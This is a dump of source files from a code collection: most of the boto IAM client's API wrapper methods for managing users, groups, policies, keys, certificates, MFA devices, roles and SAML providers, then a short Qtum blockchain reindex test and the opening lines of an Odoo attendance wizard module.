        :param user_name: The user to be added to the group.
"""
params = {'GroupName': group_name,
'UserName': user_name}
return self.get_response('AddUserToGroup', params)
def remove_user_from_group(self, group_name, user_name):
"""
Remove a user from a group.
:type group_name: string
:param group_name: The name of the group
:type user_name: string
:param user_name: The user to remove from the group.
"""
params = {'GroupName': group_name,
'UserName': user_name}
return self.get_response('RemoveUserFromGroup', params)
def put_group_policy(self, group_name, policy_name, policy_json):
"""
Adds or updates the specified policy document for the specified group.
:type group_name: string
:param group_name: The name of the group the policy is associated with.
:type policy_name: string
:param policy_name: The policy document to get.
:type policy_json: string
:param policy_json: The policy document.
"""
params = {'GroupName': group_name,
'PolicyName': policy_name,
'PolicyDocument': policy_json}
return self.get_response('PutGroupPolicy', params, verb='POST')
def get_all_group_policies(self, group_name, marker=None, max_items=None):
"""
List the names of the policies associated with the specified group.
:type group_name: string
:param group_name: The name of the group the policy is associated with.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'GroupName': group_name}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListGroupPolicies', params,
list_marker='PolicyNames')
def get_group_policy(self, group_name, policy_name):
"""
Retrieves the specified policy document for the specified group.
:type group_name: string
:param group_name: The name of the group the policy is associated with.
:type policy_name: string
:param policy_name: The policy document to get.
"""
params = {'GroupName': group_name,
'PolicyName': policy_name}
return self.get_response('GetGroupPolicy', params, verb='POST')
def delete_group_policy(self, group_name, policy_name):
"""
Deletes the specified policy document for the specified group.
:type group_name: string
:param group_name: The name of the group the policy is associated with.
:type policy_name: string
:param policy_name: The policy document to delete.
"""
params = {'GroupName': group_name,
'PolicyName': policy_name}
return self.get_response('DeleteGroupPolicy', params, verb='POST')
def get_all_users(self, path_prefix='/', marker=None, max_items=None):
"""
List the users that have the specified path prefix.
:type path_prefix: string
:param path_prefix: If provided, only users whose paths match
the provided prefix will be returned.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'PathPrefix': path_prefix}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListUsers', params, list_marker='Users')
#
# User methods
#
def create_user(self, user_name, path='/'):
"""
Create a user.
:type user_name: string
:param user_name: The name of the new user
:type path: string
:param path: The path in which the user will be created.
Defaults to /.
"""
params = {'UserName': user_name,
'Path': path}
return self.get_response('CreateUser', params)
def delete_user(self, user_name):
"""
Delete a user including the user's path, GUID and ARN.
        Note that, unlike most other user methods here, ``user_name`` is
        required and is not inferred from the signing credentials.
:type user_name: string
:param user_name: The name of the user to delete.
"""
params = {'UserName': user_name}
return self.get_response('DeleteUser', params)
def get_user(self, user_name=None):
"""
Retrieve information about the specified user.
If the user_name is not specified, the user_name is determined
implicitly based on the AWS Access Key ID used to sign the request.
:type user_name: string
:param user_name: The name of the user to retrieve.
If not specified, defaults to user making request.
"""
params = {}
if user_name:
params['UserName'] = user_name
return self.get_response('GetUser', params)
def update_user(self, user_name, new_user_name=None, new_path=None):
"""
Updates name and/or path of the specified user.
:type user_name: string
:param user_name: The name of the user
:type new_user_name: string
:param new_user_name: If provided, the username of the user will be
changed to this username.
:type new_path: string
:param new_path: If provided, the path of the user will be
changed to this path.
"""
params = {'UserName': user_name}
if new_user_name:
params['NewUserName'] = new_user_name
if new_path:
params['NewPath'] = new_path
return self.get_response('UpdateUser', params)
def get_all_user_policies(self, user_name, marker=None, max_items=None):
"""
List the names of the policies associated with the specified user.
:type user_name: string
:param user_name: The name of the user the policy is associated with.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'UserName': user_name}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListUserPolicies', params,
list_marker='PolicyNames')
def put_user_policy(self, user_name, policy_name, policy_json):
"""
Adds or updates the specified policy document for the specified user.
:type user_name: string
:param user_name: The name of the user the policy is associated with.
:type policy_name: string
:param policy_name: The policy document to get.
:type policy_json: string
:param policy_json: The policy document.
"""
params = {'UserName': user_name,
'PolicyName': policy_name,
'PolicyDocument': policy_json}
return self.get_response('PutUserPolicy', params, verb='POST')
def get_user_policy(self, user_name, policy_name):
"""
Retrieves the specified policy document for the specified user.
:type user_name: string
:param user_name: The name of the user the policy is associated with.
:type policy_name: string
:param policy_name: The policy document to get.
"""
params = {'UserName': user_name,
'PolicyName': policy_name}
return self.get_response('GetUserPolicy', params, verb='POST')
def delete_user_policy(self, user_name, policy_name):
"""
Deletes the specified policy document for the specified user.
:type user_name: string
:param user_name: The name of the user the policy is associated with.
:type policy_name: string
:param policy_name: The policy document to delete.
"""
params = {'UserName': user_name,
'PolicyName': policy_name}
return self.get_response('DeleteUserPolicy', params, verb='POST')
def get_groups_for_user(self, user_name, marker=None, max_items=None):
"""
List the groups that a specified user belongs to.
:type user_name: string
:param user_name: The name of the user to list groups for.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'UserName': user_name}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListGroupsForUser', params,
list_marker='Groups')
#
# Access Keys
#
def get_all_access_keys(self, user_name, marker=None, max_items=None):
"""
Get all access keys associated with an account.
:type user_name: string
:param user_name: The username of the user
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'UserName': user_name}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListAccessKeys', params,
list_marker='AccessKeyMetadata')
def create_access_key(self, user_name=None):
"""
Create a new AWS Secret Access Key and corresponding AWS Access Key ID
for the specified user. The default status for new keys is Active
If the user_name is not specified, the user_name is determined
implicitly based on the AWS Access Key ID used to sign the request.
:type user_name: string
:param user_name: The username of the user
"""
        params = {}
        if user_name:
            params['UserName'] = user_name
return self.get_response('CreateAccessKey', params)
def update_access_key(self, access_key_id, status, user_name=None):
"""
Changes the status of the specified access key from Active to Inactive
or vice versa. This action can be used to disable a user's key as
part of a key rotation workflow.
If the user_name is not specified, the user_name is determined
implicitly based on the AWS Access Key ID used to sign the request.
:type access_key_id: string
:param access_key_id: The ID of the access key.
:type status: string
:param status: Either Active or Inactive.
:type user_name: string
:param user_name: The username of user (optional).
"""
params = {'AccessKeyId': access_key_id,
'Status': status}
if user_name:
params['UserName'] = user_name
return self.get_response('UpdateAccessKey', params)
def delete_access_key(self, access_key_id, user_name=None):
"""
Delete an access key associated with a user.
If the user_name is not specified, it is determined implicitly based
on the AWS Access Key ID used to sign the request.
:type access_key_id: string
:param access_key_id: The ID of the access key to be deleted.
:type user_name: string
:param user_name: The username of the user
"""
params = {'AccessKeyId': access_key_id}
if user_name:
params['UserName'] = user_name
return self.get_response('DeleteAccessKey', params)
#
# Signing Certificates
#
def get_all_signing_certs(self, marker=None, max_items=None,
user_name=None):
"""
Get all signing certificates associated with an account.
If the user_name is not specified, it is determined implicitly based
on the AWS Access Key ID used to sign the request.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
:type user_name: string
:param user_name: The username of the user
"""
params = {}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
if user_name:
params['UserName'] = user_name
return self.get_response('ListSigningCertificates',
params, list_marker='Certificates')
def update_signing_cert(self, cert_id, status, user_name=None):
"""
Change the status of the specified signing certificate from
Active to Inactive or vice versa.
If the user_name is not specified, it is determined implicitly based
on the AWS Access Key ID used to sign the request.
:type cert_id: string
:param cert_id: The ID of the signing certificate
:type status: string
:param status: Either Active or Inactive.
:type user_name: string
:param user_name: The username of the user
"""
params = {'CertificateId': cert_id,
'Status': status}
if user_name:
params['UserName'] = user_name
return self.get_response('UpdateSigningCertificate', params)
def upload_signing_cert(self, cert_body, user_name=None):
"""
Uploads an X.509 signing certificate and associates it with
the specified user.
If the user_name is not specified, it is determined implicitly based
on the AWS Access Key ID used to sign the request.
:type cert_body: string
:param cert_body: The body of the signing certificate.
:type user_name: string
:param user_name: The username of the user
"""
params = {'CertificateBody': cert_body}
if user_name:
params['UserName'] = user_name
return self.get_response('UploadSigningCertificate', params,
verb='POST')
def delete_signing_cert(self, cert_id, user_name=None):
"""
Delete a signing certificate associated with a user.
If the user_name is not specified, it is determined implicitly based
on the AWS Access Key ID used to sign the request.
:type user_name: string
:param user_name: The username of the user
:type cert_id: string
:param cert_id: The ID of the certificate.
"""
params = {'CertificateId': cert_id}
if user_name:
params['UserName'] = user_name
return self.get_response('DeleteSigningCertificate', params)
#
# Server Certificates
#
def list_server_certs(self, path_prefix='/',
marker=None, max_items=None):
"""
Lists the server certificates that have the specified path prefix.
If none exist, the action returns an empty list.
:type path_prefix: string
:param path_prefix: If provided, only certificates whose paths match
the provided prefix will be returned.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {}
if path_prefix:
params['PathPrefix'] = path_prefix
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListServerCertificates',
params,
list_marker='ServerCertificateMetadataList')
# Preserves backwards compatibility.
# TODO: Look into deprecating this eventually?
get_all_server_certs = list_server_certs
def update_server_cert(self, cert_name, new_cert_name=None,
new_path=None):
"""
Updates the name and/or the path of the specified server certificate.
:type cert_name: string
:param cert_name: The name of the server certificate that you want
to update.
:type new_cert_name: string
:param new_cert_name: The new name for the server certificate.
Include this only if you are updating the
server certificate's name.
:type new_path: string
:param new_path: If provided, the path of the certificate will be
changed to this path.
"""
params = {'ServerCertificateName': cert_name}
if new_cert_name:
params['NewServerCertificateName'] = new_cert_name
if new_path:
params['NewPath'] = new_path
return self.get_response('UpdateServerCertificate', params)
def upload_server_cert(self, cert_name, cert_body, private_key,
cert_chain=None, path=None):
"""
Uploads a server certificate entity for the AWS Account.
The server certificate entity includes a public key certificate,
a private key, and an optional certificate chain, which should
all be PEM-encoded.
:type cert_name: string
:param cert_name: The name for the server certificate. Do not
include the path in this value.
:type cert_body: string
:param cert_body: The contents of the public key certificate
in PEM-encoded format.
:type private_key: string
:param private_key: The contents of the private key in
PEM-encoded format.
:type cert_chain: string
:param cert_chain: The contents of the certificate chain. This
is typically a concatenation of the PEM-encoded
public key certificates of the chain.
:type path: string
:param path: The path for the server certificate.
"""
params = {'ServerCertificateName': cert_name,
'CertificateBody': cert_body,
'PrivateKey': private_key}
if cert_chain:
params['CertificateChain'] = cert_chain
if path:
params['Path'] = path
return self.get_response('UploadServerCertificate', params,
verb='POST')
def get_server_certificate(self, cert_name):
"""
Retrieves information about the specified server certificate.
:type cert_name: string
:param cert_name: The name of the server certificate you want
to retrieve information about.
"""
params = {'ServerCertificateName': cert_name}
return self.get_response('GetServerCertificate', params)
def delete_server_cert(self, cert_name):
"""
Delete the specified server certificate.
:type cert_name: string
:param cert_name: The name of the server certificate you want
to delete.
"""
params = {'ServerCertificateName': cert_name}
return self.get_response('DeleteServerCertificate', params)
#
# MFA Devices
#
def get_all_mfa_devices(self, user_name, marker=None, max_items=None):
"""
Get all MFA devices associated with an account.
:type user_name: string
:param user_name: The username of the user
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'UserName': user_name}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListMFADevices',
params, list_marker='MFADevices')
def enable_mfa_device(self, user_name, serial_number,
auth_code_1, auth_code_2):
"""
Enables the specified MFA device and associates it with the
specified user.
:type user_name: string
:param user_name: The username of the user
:type serial_number: string
:param serial_number: The serial number which uniquely identifies
the MFA device.
:type auth_code_1: string
:param auth_code_1: An authentication code emitted by the device.
:type auth_code_2: string
:param auth_code_2: A subsequent authentication code emitted
by the device.
"""
params = {'UserName': user_name,
'SerialNumber': serial_number,
'AuthenticationCode1': auth_code_1,
'AuthenticationCode2': auth_code_2}
return self.get_response('EnableMFADevice', params)
def deactivate_mfa_device(self, user_name, serial_number):
"""
Deactivates the specified MFA device and removes it from
association with the user.
:type user_name: string
:param user_name: The username of the user
:type serial_number: string
:param serial_number: The serial number which uniquely identifies
the MFA device.
"""
params = {'UserName': user_name,
'SerialNumber': serial_number}
return self.get_response('DeactivateMFADevice', params)
def resync_mfa_device(self, user_name, serial_number,
auth_code_1, auth_code_2):
"""
        Synchronizes the specified MFA device with the AWS servers.
:type user_name: string
:param user_name: The username of the user
:type serial_number: string
:param serial_number: The serial number which uniquely identifies
the MFA device.
:type auth_code_1: string
:param auth_code_1: An authentication code emitted by the device.
:type auth_code_2: string
:param auth_code_2: A subsequent authentication code emitted
by the device.
"""
params = {'UserName': user_name,
'SerialNumber': serial_number,
'AuthenticationCode1': auth_code_1,
'AuthenticationCode2': auth_code_2}
return self.get_response('ResyncMFADevice', params)
#
# Login Profiles
#
def get_login_profiles(self, user_name):
"""
Retrieves the login profile for the specified user.
:type user_name: string
:param user_name: The username of the user
"""
params = {'UserName': user_name}
return self.get_response('GetLoginProfile', params)
def create_login_profile(self, user_name, password):
"""
        Creates a login profile for the specified user, giving the user
        the ability to access AWS services and the AWS Management Console.
:type user_name: string
:param user_name: The name of the user
:type password: string
:param password: The new password for the user
"""
params = {'UserName': user_name,
'Password': password}
return self.get_response('CreateLoginProfile', params)
def delete_login_profile(self, user_name):
"""
Deletes the login profile associated with the specified user.
:type user_name: string
        :param user_name: The name of the user whose login profile should be deleted.
"""
params = {'UserName': user_name}
return self.get_response('DeleteLoginProfile', params)
def update_login_profile(self, user_name, password):
"""
Resets the password associated with the user's login profile.
:type user_name: string
:param user_name: The name of the user
:type password: string
:param password: The new password for the user
"""
params = {'UserName': user_name,
'Password': password}
return self.get_response('UpdateLoginProfile', params)
def create_account_alias(self, alias):
"""
Creates a new alias for the AWS account.
For more information on account id aliases, please see
http://goo.gl/ToB7G
:type alias: string
:param alias: The alias to attach to the account.
"""
params = {'AccountAlias': alias}
return self.get_response('CreateAccountAlias', params)
def delete_account_alias(self, alias):
"""
Deletes an alias for the AWS account.
For more information on account id aliases, please see
http://goo.gl/ToB7G
:type alias: string
:param alias: The alias to remove from the account.
"""
params = {'AccountAlias': alias}
return self.get_response('DeleteAccountAlias', params)
def get_account_alias(self):
"""
Get the alias for the current account.
This is referred to in the docs as list_account_aliases,
but it seems you can only have one account alias currently.
For more information on account id aliases, please see
http://goo.gl/ToB7G
"""
return self.get_response('ListAccountAliases', {},
list_marker='AccountAliases')
def get_signin_url(self, service='ec2'):
"""
Get the URL where IAM users can use their login profile to sign in
to this account's console.
:type service: string
:param service: Default service to go to in the console.
"""
alias = self.get_account_alias()
if not alias:
raise Exception('No alias associated with this account. Please use iam.create_account_alias() first.')
resp = alias.get('list_account_aliases_response', {})
result = resp.get('list_account_aliases_result', {})
aliases = result.get('account_aliases', [])
if not len(aliases):
raise Exception('No alias associated with this account. Please use iam.create_account_alias() first.')
# We'll just use the first one we find.
alias = aliases[0]
if self.host == 'iam.us-gov.amazonaws.com':
return "https://%s.signin.amazonaws-us-gov.com/console/%s" % (
alias,
service
)
elif self.host.endswith('amazonaws.com.cn'):
return "https://%s.signin.amazonaws.cn/console/%s" % (
alias,
service
)
else:
return "https://%s.signin.aws.amazon.com/console/%s" % (
alias,
service
)
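    # Example (illustrative; the alias is hypothetical): an account aliased
    # 'example-co' on the default endpoint yields
    #   https://example-co.signin.aws.amazon.com/console/ec2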
def get_account_summary(self):
"""
        Get a summary of account-level IAM usage and quotas.
        Returns a SummaryMap of entity counts (users, groups, MFA
        devices, etc.) together with the corresponding account limits.
"""
return self.get_object('GetAccountSummary', {}, SummaryMap)
#
# IAM Roles
#
def add_role_to_instance_profile(self, instance_profile_name, role_name):
"""
Adds the specified role to the specified instance profile.
:type instance_profile_name: string
:param instance_profile_name: Name of the instance profile to update.
:type role_name: string
:param role_name: Name of the role to add.
"""
return self.get_response('AddRoleToInstanceProfile',
{'InstanceProfileName': instance_profile_name,
'RoleName': role_name})
def create_instance_profile(self, instance_profile_name, path=None):
"""
Creates a new instance profile.
:type instance_profile_name: string
:param instance_profile_name: Name of the instance profile to create.
:type path: string
:param path: The path to the instance profile.
"""
params = {'InstanceProfileName': instance_profile_name}
if path is not None:
params['Path'] = path
return self.get_response('CreateInstanceProfile', params)
def _build_policy(self, assume_role_policy_document=None):
if assume_role_policy_document is not None:
if isinstance(assume_role_policy_document, six.string_types):
# Historically, they had to pass a string. If it's a string,
# assume the user has already handled it.
return assume_role_policy_document
else:
for tld, policy in DEFAULT_POLICY_DOCUMENTS.items():
                if tld == 'default':
# Skip the default. We'll fall back to it if we don't find
# anything.
continue
if self.host and self.host.endswith(tld):
assume_role_policy_document = policy
break
if not assume_role_policy_document:
assume_role_policy_document = DEFAULT_POLICY_DOCUMENTS['default']
# Dump the policy (either user-supplied ``dict`` or one of the defaults)
return json.dumps(assume_role_policy_document)
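    # Behaviour sketch (derived from the logic above): a string document is
    # returned untouched, a dict is serialized with json.dumps, and with no
    # document at all the connection host's suffix picks a default: hosts
    # ending in 'amazonaws.com.cn' get the China-region EC2 principal,
    # everything else the global default.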
def create_role(self, role_name, assume_role_policy_document=None, path=None):
"""
Creates a new role for your AWS account.
The policy grants permission to an EC2 instance to assume the role.
The policy is URL-encoded according to RFC 3986. Currently, only EC2
instances can assume roles.
:type role_name: string
:param role_name: Name of the role to create.
:type assume_role_policy_document: ``string`` or ``dict``
:param assume_role_policy_document: The policy that grants an entity
permission to assume the role.
:type path: string
:param path: The path to the role.
"""
params = {
'RoleName': role_name,
'AssumeRolePolicyDocument': self._build_policy(
assume_role_policy_document
),
}
if path is not None:
params['Path'] = path
return self.get_response('CreateRole', params)
def delete_instance_profile(self, instance_profile_name):
"""
Deletes the specified instance profile. The instance profile must not
have an associated role.
:type instance_profile_name: string
:param instance_profile_name: Name of the instance profile to delete.
"""
return self.get_response(
'DeleteInstanceProfile',
{'InstanceProfileName': instance_profile_name})
def delete_role(self, role_name):
"""
Deletes the specified role. The role must not have any policies
attached.
:type role_name: string
:param role_name: Name of the role to delete.
"""
return self.get_response('DeleteRole', {'RoleName': role_name})
def delete_role_policy(self, role_name, policy_name):
"""
Deletes the specified policy associated with the specified role.
:type role_name: string
:param role_name: Name of the role associated with the policy.
:type policy_name: string
:param policy_name: Name of the policy to delete.
"""
return self.get_response(
'DeleteRolePolicy',
{'RoleName': role_name, 'PolicyName': policy_name})
def get_instance_profile(self, instance_profile_name):
"""
Retrieves information about the specified instance profile, including
the instance profile's path, GUID, ARN, and role.
:type instance_profile_name: string
:param instance_profile_name: Name of the instance profile to get
information about.
"""
return self.get_response('GetInstanceProfile',
{'InstanceProfileName': instance_profile_name})
def get_role(self, role_name):
"""
Retrieves information about the specified role, including the role's
path, GUID, ARN, and the policy granting permission to EC2 to assume
the role.
:type role_name: string
:param role_name: Name of the role associated with the policy.
"""
return self.get_response('GetRole', {'RoleName': role_name})
def get_role_policy(self, role_name, policy_name):
"""
Retrieves the specified policy document for the specified role.
:type role_name: string
:param role_name: Name of the role associated with the policy.
:type policy_name: string
:param policy_name: Name of the policy to get.
"""
return self.get_response('GetRolePolicy',
{'RoleName': role_name,
'PolicyName': policy_name})
def list_instance_profiles(self, path_prefix=None, marker=None,
max_items=None):
"""
Lists the instance profiles that have the specified path prefix. If
there are none, the action returns an empty list.
:type path_prefix: string
:param path_prefix: The path prefix for filtering the results. For
example: /application_abc/component_xyz/, which would get all
instance profiles whose path starts with
/application_abc/component_xyz/.
:type marker: string
:param marker: Use this parameter only when paginating results, and
only in a subsequent request after you've received a response
where the results are truncated. Set it to the value of the
Marker element in the response you just received.
:type max_items: int
:param max_items: Use this parameter only when paginating results to
indicate the maximum number of user names you want in the response.
"""
params = {}
if path_prefix is not None:
params['PathPrefix'] = path_prefix
if marker is not None:
params['Marker'] = marker
if max_items is not None:
params['MaxItems'] = max_items
return self.get_response('ListInstanceProfiles', params,
list_marker='InstanceProfiles')
def list_instance_profiles_for_role(self, role_name, marker=None,
max_items=None):
"""
Lists the instance profiles that have the specified associated role. If
there are none, the action returns an empty list.
:type role_name: string
:param role_name: The name of the role to list instance profiles for.
:type marker: string
:param marker: Use this parameter only when paginating results, and
only in a subsequent request after you've received a response
where the results are truncated. Set it to the value of the
Marker element in the response you just received.
:type max_items: int
:param max_items: Use this parameter only when paginating results to
indicate the maximum number of user names you want in the response.
"""
params = {'RoleName': role_name}
if marker is not None:
params['Marker'] = marker
if max_items is not None:
params['MaxItems'] = max_items
return self.get_response('ListInstanceProfilesForRole', params,
list_marker='InstanceProfiles')
def list_role_policies(self, role_name, marker=None, max_items=None):
"""
Lists the names of the policies associated with the specified role. If
there are none, the action returns an empty list.
:type role_name: string
:param role_name: The name of the role to list policies for.
:type marker: string
:param marker: Use this parameter only when paginating results, and
only in a subsequent request after you've received a response
where the results are truncated. Set it to the value of the
marker element in the response you just received.
:type max_items: int
:param max_items: Use this parameter only when paginating results to
indicate the maximum number of user names you want in the response.
"""
params = {'RoleName': role_name}
if marker is not None:
params['Marker'] = marker
if max_items is not None:
params['MaxItems'] = max_items
return self.get_response('ListRolePolicies', params,
list_marker='PolicyNames')
def list_roles(self, path_prefix=None, marker=None, max_items=None):
"""
Lists the roles that have the specified path prefix. If there are none,
the action returns an empty list.
:type path_prefix: string
:param path_prefix: The path prefix for filtering the results.
:type marker: string
:param marker: Use this parameter only when paginating results, and
only in a subsequent request after you've received a response
where the results are truncated. Set it to the value of the
marker element in the response you just received.
:type max_items: int
:param max_items: Use this parameter only when paginating results to
indicate the maximum number of user names you want in the response.
"""
params = {}
if path_prefix is not None:
params['PathPrefix'] = path_prefix
if marker is not None:
params['Marker'] = marker
if max_items is not None:
params['MaxItems'] = max_items
return self.get_response('ListRoles', params, list_marker='Roles')
def put_role_policy(self, role_name, policy_name, policy_document):
"""
Adds (or updates) a policy document associated with the specified role.
:type role_name: string
:param role_name: Name of the role to associate the policy with.
:type policy_name: string
:param policy_name: Name of the policy document.
:type policy_document: string
:param policy_document: The policy document.
"""
return self.get_response('PutRolePolicy',
{'RoleName': role_name,
'PolicyName': policy_name,
'PolicyDocument': policy_document})
def remove_role_from_instance_profile(self, instance_profile_name,
role_name):
"""
Removes the specified role from the specified instance profile.
:type instance_profile_name: string
:param instance_profile_name: Name of the instance profile to update.
:type role_name: string
:param role_name: Name of the role to remove.
"""
return self.get_response('RemoveRoleFromInstanceProfile',
{'InstanceProfileName': instance_profile_name,
'RoleName': role_name})
def update_assume_role_policy(self, role_name, policy_document):
"""
Updates the policy that grants an entity permission to assume a role.
Currently, only an Amazon EC2 instance can assume a role.
:type role_name: string
:param role_name: Name of the role to update.
:type policy_document: string
:param policy_document: The policy that grants an entity permission to
assume the role.
"""
return self.get_response('UpdateAssumeRolePolicy',
{'RoleName': role_name,
'PolicyDocument': policy_document})
def create_saml_provider(self, saml_metadata_document, name):
"""
Creates an IAM entity to describe an identity provider (IdP)
that supports SAML 2.0.
The SAML provider that you create with this operation can be
used as a principal in a role's trust policy to establish a
trust relationship between AWS and a SAML identity provider.
You can create an IAM role that supports Web-based single
sign-on (SSO) to the AWS Management Console or one that
supports API access to AWS.
        When you create the SAML provider, you upload a SAML
metadata document that you get from your IdP and that includes
the issuer's name, expiration information, and keys that can
be used to validate the SAML authentication response
(assertions) that are received from the IdP. You must generate
the metadata document using the identity management software
that is used as your organization's IdP.
This operation requires `Signature Version 4`_.
For more information, see `Giving Console Access Using SAML`_
and `Creating Temporary Security Credentials for SAML
Federation`_ in the Using Temporary Credentials guide.
:type saml_metadata_document: string
:param saml_metadata_document: An XML document generated by an identity
provider (IdP) that supports SAML 2.0. The document includes the
issuer's name, expiration information, and keys that can be used to
validate the SAML authentication response (assertions) that are
received from the IdP. You must generate the metadata document
using the identity management software that is used as your
organization's IdP.
For more information, see `Creating Temporary Security Credentials for
SAML Federation`_ in the Using Temporary Security Credentials
guide.
:type name: string
:param name: The name of the provider to create.
"""
params = {
'SAMLMetadataDocument': saml_metadata_document,
'Name': name,
}
return self.get_response('CreateSAMLProvider', params)
def list_saml_providers(self):
"""
Lists the SAML providers in the account.
This operation requires `Signature Version 4`_.
"""
return self.get_response('ListSAMLProviders', {}, list_marker='SAMLProviderList')
def get_saml_provider(self, saml_provider_arn):
"""
Returns the SAML provider metadocument that was uploaded when
the provider was created or updated.
This operation requires `Signature Version 4`_.
:type saml_provider_arn: string
:param saml_provider_arn: The Amazon Resource Name (ARN) of the SAML
provider to get information about.
"""
params = {'SAMLProviderArn': saml_provider_arn}
return self.get_response('GetSAMLProvider', params)
def update_saml_provider(self, saml_provider_arn, saml_metadata_document):
"""
Updates the metadata document for an existing SAML provider.
This operation requires `Signature Version 4`_.
:type saml_provider_arn: string
:param saml_provider_arn: The Amazon Resource Name (ARN) of the SAML
provider to update.
:type saml_metadata_document: string
:param saml_metadata_document: An XML document generated by an identity
provider (IdP) that supports SAML 2.0. The document includes the
issuer's name, expiration information, and keys that can be used to
validate the SAML authentication response (assertions) that are
received from the IdP. You must generate the metadata document
using the identity management software that is used as your
organization's IdP.
"""
params = {
'SAMLMetadataDocument': saml_metadata_document,
'SAMLProviderArn': saml_provider_arn,
}
return self.get_response('UpdateSAMLProvider', params)
def delete_saml_provider(self, saml_provider_arn):
"""
Deletes a SAML provider.
Deleting the provider does not update any roles that reference
the SAML provider as a principal in their trust policies. Any
attempt to assume a role that references a SAML provider that
has been deleted will fail.
This operation requires `Signature Version 4`_.
:type saml_provider_arn: string
:param saml_provider_arn: The Amazon Resource Name (ARN) of the SAML
provider to delete.
"""
params = {'SAMLProviderArn': saml_provider_arn}
return self.get_response('DeleteSAMLProvider', params)
#
# IAM Reports
#
def generate_credential_report(self):
"""
Generates a credential report for an account
        A new credential report can only be generated every 4 hours. If one
        hasn't been generated in the last 4 hours, ``get_credential_report``
        will raise an error when called.
"""
params = {}
return self.get_response('GenerateCredentialReport', params)
def get_credential_report(self):
"""
Retrieves a credential report for an account
A report must have been generated in the last 4 hours to succeed.
The report is returned as a base64 encoded blob within the response.
"""
params = {}
return self.get_response('GetCredentialReport', params)
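    # Typical flow (illustrative; the exact response keys depend on the
    # parsed XML): call generate_credential_report(), wait until it reports
    # that generation is complete, then base64-decode the blob returned by
    # get_credential_report() to obtain the CSV report.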
def create_virtual_mfa_device(self, path, device_name):
"""
Creates a new virtual MFA device for the AWS account.
        After creating the virtual MFA device, use ``enable_mfa_device`` to
        attach the MFA device to an IAM user.
:type path: string
:param path: The path for the virtual MFA device.
:type device_name: string
:param device_name: The name of the virtual MFA device.
Used with path to uniquely identify a virtual MFA device.
"""
params = {
'Path': path,
'VirtualMFADeviceName': device_name
}
return self.get_response('CreateVirtualMFADevice', params)
| mit |
qtumproject/qtum | test/functional/feature_reindex.py | 32 | 1414 | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test running bitcoind with -reindex and -reindex-chainstate options.
- Start a single node and generate 3 blocks.
- Stop the node and restart it with -reindex. Verify that the node has reindexed up to block 3.
- Stop the node and restart it with -reindex-chainstate. Verify that the node has reindexed up to block 3.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import wait_until
class ReindexTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def reindex(self, justchainstate=False):
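        # Mine a few blocks, restart the node with the requested reindex
        # flag, and wait until it re-derives the same block height.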
self.nodes[0].generatetoaddress(3, self.nodes[0].get_deterministic_priv_key().address)
blockcount = self.nodes[0].getblockcount()
self.stop_nodes()
extra_args = [["-reindex-chainstate" if justchainstate else "-reindex"]]
self.start_nodes(extra_args)
wait_until(lambda: self.nodes[0].getblockcount() == blockcount)
self.log.info("Success")
def run_test(self):
self.reindex(False)
self.reindex(True)
self.reindex(False)
self.reindex(True)
if __name__ == '__main__':
ReindexTest().main()
| mit |
rruebner/odoo | addons/hr_attendance/wizard/hr_attendance_error.py | 377 | 2896 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
from openerp.tools.translate import _
